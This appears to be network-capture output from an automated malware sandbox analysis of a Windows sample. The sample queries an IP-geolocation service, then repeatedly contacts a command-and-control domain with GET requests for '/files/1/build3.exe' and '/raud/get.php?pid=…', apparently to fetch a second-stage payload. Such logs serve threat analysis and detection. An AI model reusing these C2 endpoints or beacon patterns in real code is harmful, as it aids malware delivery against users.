                                                                                                      Feb 12, 2024 01:36:17.147032976 CET49742443192.168.2.4104.21.65.24
                                                                                                      Feb 12, 2024 01:36:17.147042036 CET44349742104.21.65.24192.168.2.4
                                                                                                      Feb 12, 2024 01:36:32.063086033 CET8049731199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:32.063184977 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:36:35.284475088 CET8049734199.59.242.150192.168.2.4
                                                                                                      Feb 12, 2024 01:36:35.284563065 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:03.457539082 CET4973180192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:03.457680941 CET4973280192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:47.040621996 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:47.352627993 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:47.961855888 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:49.165275097 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:51.571266890 CET4973480192.168.2.4199.59.242.150
                                                                                                      Feb 12, 2024 01:37:56.383718967 CET4973480192.168.2.4199.59.242.150
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 12, 2024 01:35:53.367844105 CET | 58773 | 53 | 192.168.2.4 | 1.1.1.1
Feb 12, 2024 01:35:53.491553068 CET | 53 | 58773 | 1.1.1.1 | 192.168.2.4
Feb 12, 2024 01:35:56.087999105 CET | 55960 | 53 | 192.168.2.4 | 1.1.1.1
Feb 12, 2024 01:35:56.093097925 CET | 50274 | 53 | 192.168.2.4 | 1.1.1.1
Feb 12, 2024 01:35:56.226680040 CET | 53 | 55960 | 1.1.1.1 | 192.168.2.4
Feb 12, 2024 01:35:56.370719910 CET | 53 | 50274 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 12, 2024 01:35:53.367844105 CET | 192.168.2.4 | 1.1.1.1 | 0x649d | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001) | false
Feb 12, 2024 01:35:56.087999105 CET | 192.168.2.4 | 1.1.1.1 | 0xcc02 | Standard query (0) | colisumy.com | A (IP address) | IN (0x0001) | false
Feb 12, 2024 01:35:56.093097925 CET | 192.168.2.4 | 1.1.1.1 | 0x3ca2 | Standard query (0) | zexeq.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 12, 2024 01:35:53.491553068 CET | 1.1.1.1 | 192.168.2.4 | 0x649d | No error (0) | api.2ip.ua | | 104.21.65.24 | A (IP address) | IN (0x0001) | false
Feb 12, 2024 01:35:53.491553068 CET | 1.1.1.1 | 192.168.2.4 | 0x649d | No error (0) | api.2ip.ua | | 172.67.139.220 | A (IP address) | IN (0x0001) | false
Feb 12, 2024 01:35:56.226680040 CET | 1.1.1.1 | 192.168.2.4 | 0xcc02 | Name error (3) | colisumy.com | none | none | A (IP address) | IN (0x0001) | false
Feb 12, 2024 01:35:56.370719910 CET | 1.1.1.1 | 192.168.2.4 | 0x3ca2 | No error (0) | zexeq.com | | 199.59.242.150 | A (IP address) | IN (0x0001) | false
                                                                                                      • api.2ip.ua
                                                                                                      • zexeq.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 199.59.242.150 | 80 | 6956 | C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
Timestamp | Bytes transferred | Direction | Data
Feb 12, 2024 01:35:56.488809109 CET | 94 | OUT | GET /files/1/build3.exe HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
Feb 12, 2024 01:35:56.603971958 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:35:56 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=4a25a78a-7e70-da91-9fcb-1f470520f028; expires=Mon, 12 Feb 2024 00:50:56 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AyFYBBlMTK+s2drH8M/UuPtOwgC0Q5I+qr6O091jvNRK6y+GaB6ZjIqhRqzVqygllAXfB/mUUSa2qc1J/c/Glg==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Ascii: 35b<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AyFYBBlMTK+s2drH8M/UuPtOwgC0Q5I+qr6O091jvNRK6y+GaB6ZjIqhRqzVqygllAXfB/mUUSa2qc1J/c/Glg=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
Feb 12, 2024 01:35:56.604015112 CET | 401 | IN |
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiNGEyNWE3OGEtN2U3MC1kYTkxLTlmY2ItMWY0NzA1MjBmMDI4IiwicGFnZV90aW1lIjoxNzA3Njk4MTU2LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvZmlsZXNcLzFcL2J1aWxkMy5leGUiLCJwYWdlX21ldGhvZCI6IkdFVCIsInBhZ2VfcmVxdWV
Feb 12, 2024 01:35:56.604048014 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 199.59.242.150 | 80 | 6956 | C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
Timestamp | Bytes transferred | Direction | Data
Feb 12, 2024 01:35:56.491031885 CET | 136 | OUT | GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
Feb 12, 2024 01:35:56.609514952 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:35:56 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:50:56 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:35:56.609550953 CET | 457 | IN | Data Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 6d 51 33 4e 47 59 77 59 32 51 74 4e 47 5a 6d 4d 53 31 6a 4d 6a 63 7a 4c 54 4d 7a 5a 6a 45 74 5a 6a
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTU2LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
                                                                                                      Feb 12, 2024 01:35:56.609584093 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0
                                                                                                      Feb 12, 2024 01:36:01.604569912 CET | 198 | OUT | GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
                                                                                                      Feb 12, 2024 01:36:01.722901106 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:36:01 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:51:01 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:36:01.722963095 CET | 457 | IN | Data Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 6d 51 33 4e 47 59 77 59 32 51 74 4e 47 5a 6d 4d 53 31 6a 4d 6a 63 7a 4c 54 4d 7a 5a 6a 45 74 5a 6a
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTYxLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
                                                                                                      Feb 12, 2024 01:36:01.723001003 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0
                                                                                                      Feb 12, 2024 01:36:06.791857958 CET | 198 | OUT | GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
                                                                                                      Feb 12, 2024 01:36:06.910274982 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:36:06 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:51:06 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:36:06.910336018 CET | 457 | IN | Data Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 6d 51 33 4e 47 59 77 59 32 51 74 4e 47 5a 6d 4d 53 31 6a 4d 6a 63 7a 4c 54 4d 7a 5a 6a 45 74 5a 6a
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTY2LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
                                                                                                      Feb 12, 2024 01:36:06.910376072 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0
                                                                                                      Feb 12, 2024 01:36:11.944216967 CET | 198 | OUT | GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
                                                                                                      Feb 12, 2024 01:36:12.062108040 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:36:12 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:51:12 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:36:12.062120914 CET | 457 | IN | Data Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 6d 51 33 4e 47 59 77 59 32 51 74 4e 47 5a 6d 4d 53 31 6a 4d 6a 63 7a 4c 54 4d 7a 5a 6a 45 74 5a 6a
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTcyLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
                                                                                                      Feb 12, 2024 01:36:12.062130928 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      2 | 192.168.2.4 | 49734 | 199.59.242.150 | 80 | 5776 | C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Feb 12, 2024 01:35:58.283723116 CET | 187 | OUT | GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
                                                                                                      Feb 12, 2024 01:35:58.402215004 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:35:58 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:50:58 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Ascii: 383<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:35:58.402254105 CET | 441 | IN | Data Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 6d 51 33 4e 47 59 77 59 32 51 74 4e 47 5a 6d 4d 53 31 6a 4d 6a 63 7a 4c 54 4d 7a 5a 6a 45 74 5a 6a
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTU4LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzciLCJ
                                                                                                      Feb 12, 2024 01:35:58.402290106 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0
                                                                                                      Feb 12, 2024 01:36:03.479585886 CET | 187 | OUT | GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
                                                                                                      Feb 12, 2024 01:36:03.598073959 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:36:03 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:51:03 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Ascii: 383<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
Feb 12, 2024 01:36:03.598182917 CET | 441 | IN
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTYzLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzciLCJ
Feb 12, 2024 01:36:03.598205090 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0
Feb 12, 2024 01:36:09.965564013 CET | 187 | OUT | GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
Feb 12, 2024 01:36:10.084898949 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:36:10 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:51:10 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Ascii: 383<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
Feb 12, 2024 01:36:10.084955931 CET | 441 | IN
